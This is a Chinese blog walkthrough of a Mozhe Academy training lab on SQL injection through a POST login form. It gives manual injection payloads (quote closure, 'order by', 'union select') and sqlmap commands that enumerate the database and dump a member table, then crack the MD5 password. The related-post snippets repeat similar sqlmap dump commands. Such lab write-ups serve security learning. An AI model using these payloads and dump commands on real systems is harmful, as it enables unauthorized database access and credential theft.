墨者学院:SQL注入漏洞测试(POST)

最新推荐文章于 2024-09-30 14:17:39 发布
最新推荐文章于 2024-09-30 14:17:39 发布
阅读量303 收藏 5
点赞数 2
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76631050/article/details/140618677
版权

第一种简单方法也是难理解的方法:

此题说是POST提交方式,所以我们需要用BP进行抓包

在登陆界面随便输入账号密码,可以看到下方图片红色框,抓到了

我们点击此页面使用快捷键ctrl+r,然后来到重放器界面

然后我们需要猜他的闭合方式

根据图片输入 ’          发现页面报错了,那我们把 ’  注释掉看看

页面显示正常

我们直接判断列数

‘ order by 4#

4错3对,说明有3列

联合查询

输入       ‘ union select 1,2,3#

直接获取到了KEY

第二种方法:

依旧是先抓包

然后把此页代码复制到桌面的文本里

保存文件

然后打开sqlmap,kali也行(自带sqlmap)

执行 python sqlmap.py -r 把文件拖到里面即可 –-batch

(我电脑里只有python3所以我输入python,多种环境的用python3执行)

执行如下命令:

python sqlmap.py -r C:\Users\sya\Desktop\23.txt --current-db –batch

查出当前数据库

执行命令

python sqlmap.py -r C:\Users\sya\Desktop\23.txt -D mozhe_Discuz_StormGroup --tables –batch

查出库中的表

执行命令如下命令查出列

python sqlmap.py -r C:\Users\sya\Desktop\23.txt -D mozhe_Discuz_StormGroup -T StormGroup_member –dump --batch

账号密码直接出来了

这里第一个用户密码被禁用了,直接用第二个就好了。但是这里密码用了md5加密,去网上随便找一个md5解密

登陆成功

Meet.meet
关注
墨者学院——SQL注入漏洞测试(POST)
2303_76679642的博客
04-23 710
6.找字段内容“sqlmap -r post.txt --level 5 --risk 3 -D 数据库名 -T 数据表名 -C (字段1,字段2,....) --dump --dbms mysql --batch”5.找数据库表里面的字段“sqlmap -r post.txt --level 5 --risk 3 -D 数据库名 -T 数据表名 --columns --dbms mysql --batch”测试环境为Kali Linux。
墨者学院-SQL注入漏洞测试(布尔盲注)
qq_47094508的博客
01-23 3133
手工测试和工具测试工具sqlmap)工具使用参考连接https://www.anquanke.com/post/id/235846首先我们拿到题目之后会得到一个登录框这时候需要去寻找他的注入点,可以通过登陆键下方的提示进去,也可以使用工具一把梭这工具是真好用(火狐小插件) 当我们来到这个注入点的页面就可以用工具一把梭 首先爆他的库名 在爆表名 列名 抓内容 抓到之后md5解密,最终得到flag 手工测试首先判断注入点是否存在 盲注没有回显所以我们首先需要判断库名长度,通过测试最终
SQL注入漏洞手工挖掘大全(保姆级干货教学)
qq_34780861的博客
03-27 1656
mysql 5.0以下为低版本,5.0以上为高版本(有information_schema数据库)这个数据库是存储所有数据库名,表名,列名,相当于可以通过查询这个数据库获取指定数据库下面的表名列名信息。
墨者学院SQL注入漏洞测试(POST)
weixin_57240513的博客
07-22 439
WEB业务系统中,POST方式提交数据很常见,如登录框、留言评论等可能都会用到,这种与GET方式其实差。
墨者学院-SQL注入漏洞测试(POST)解析
l_OMl_l的博客
07-22 197
正常流程应该是查到回显点后,在其位置查所在数据库,数据表,列名以获取账号密码登录后获取 key ,但这里不知道为什么直接登录到了后台,直接获取了key。注:此处不可使用 --+ 闭合, + 会被识别为空格,由于账号栏后方为空,空格会被省略,使用 # 即可。order by 3 未报错,order by 4 报错,证明有三列数据。在name之后加单引号引起报错,则name可作为注入点。
墨者学院-SQL注入漏洞测试(POST)
qq_66105152的博客
07-22 177
3.查当前数据库,得到当前数据库为mozhe_Discuz_StormGroup。6.明显name和password可疑,查第一个表中的数据。发现密码是一串MD5,去MD5解码网站。2.用 sqlmap查所有数据库。1.先用burpsuit抓包。4.获取当前数据库的表。
墨者学院 - SQL注入漏洞测试(POST)
多崎巡礼的博客
08-20 5381
此题和最开始拿到sql注入不一样,注入点不再是公告了,二是登陆页面的账号栏,简单的语句就能得到错误回显 根据题目提示,post请求 1)随便输入用户名和密码,然后使用 burp抓取登录界面的post包,保存为txt; 2)将txt放在sqlmap目录下; 3)打开sqlmap,使用post注入; sqlmap.py -r 文件路径/文件名 --dbs  //证明可以注入,且获取所有数据库名...
墨者学院】“SQL注入漏洞测试(POST)”详细通关
m0_54407057的博客
07-22 368
墨者学院SQL注入漏洞测试(POST) 通关教程,附思路代码
墨者靶场 post ,DB2,绕过登录,sql注入四关
07-22
2. **SQL注入示例**:当DB2存在SQL注入漏洞时,可以通过输入`4`来表示希望查询的列数为4。这通常意味着,如果攻击者能够成功构造SQL语句,就能从数据库中获取4列数据。 3. **列名猜测**:使用专门的SQL注入工具...
墨者靶场】---1、SQL手工注入漏洞测试
qq_43168364的博客
08-21 281
实训目标 掌握SQL注入原理; 了解手工注入的方法; 了解MySQL的数据结构; 了解字符串的MD5加解密; sql注入的流程 1、判断注入点 2、判断注入类型,是字符型还是数字型 3、判断字段数 4、判断显示位 5、得库名 6、得表名 7、得列名 8、得数据 盲注和报错注入可能不太会用到上面的步骤,但是大致思想都是相同的。 注入步骤 起初以为是在登录窗口进行的POST注入,试了很多次没有成功,后来发现下面还有一个页面 在这里找到了它的注入点在URL中 接下来判断注入类型(这里and应该是被
PostgreSQL的表碎片
文牧之的博客
09-29 506
表碎片化是指表数据在文件系统中的不连续存储,导致读取和写入操作的效率降低。频繁的插入和删除:导致数据块中出现“空洞”。更新操作:由于 PostgreSQL 的 MVCC(多版本并发控制)机制,更新操作会生成新的行版本,原来的空间会被标记为可重用但是不立即回收。
实用SQL小总结
UntifA的博客
09-29 1342
SQL记录
PostgreSQL 字段使用pglz压缩测试
最新发布
文牧之的博客
09-30 404
创建测试表1,并插入1000w行数据–创建测试表2,使用 pglz压缩字段,并插入1000w行数据对比表yewu1.test1和yewu1.test2的大小,没体现出压缩了。
sql中的regexp与like区别
✨ 欢迎来到【Seal ^_^ 的CSDN博客】!这里是我记录技术心得、分享经验的地方。✨
09-26 5307
对于字符串数据的模糊匹配,REGEXP(正则表达式)和LIKE是两个非常有用的操作符。
SQL中基本SELECT语句及常见关键字的使用(内连接,左/右连接)
qq_43800449的博客
09-29 916
DDL(Data Definition Languages)语句:数据定义语言,这些语句定义了不同的数据段、数据库、表、列、索引等数据库对象的定义。常用的语句关键字主要包括 create 、 drop 、 alter 、create等。DML(Data Manipulation Language)语句:数据操纵语句,用于添加、删除、更新和查询数据库记录(增删改查),并检查数据完整性,常用的语句关键字主要包括 insert 、 delete 、 update 等。
PostgreSQL 17新特性merge语法增强
zxrhhm的博客
09-27 611
merge语法增强,支持 RETURNING 子句,可以返回新增、更新或者删除的数据行
[EBPF] 实时捕获DM数据库是否存在SQL阻塞
飞奔的屎壳郎
09-27 1011
名称版本linux版本(centos8.5)DM88.1.4.27python利用ebpf技术在不登录数据库的情况下,通过对数据库的函数添加钩子,实时的对数据库是否存在阻塞判断现有的监控逻辑都是新建数据库用户执行SQL语句来判断阻塞情况,告警的实时性取决于监控的周期频率,而使用ebpf技术能够解决这个痛点ebpf有多种实现方式,这里便于理解测试的话 使用python语言内置c语言的形式进行了说明。涉及到生产环境应该是使用go语言或者c语言去做能够有效避免源码泄露等问题。
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值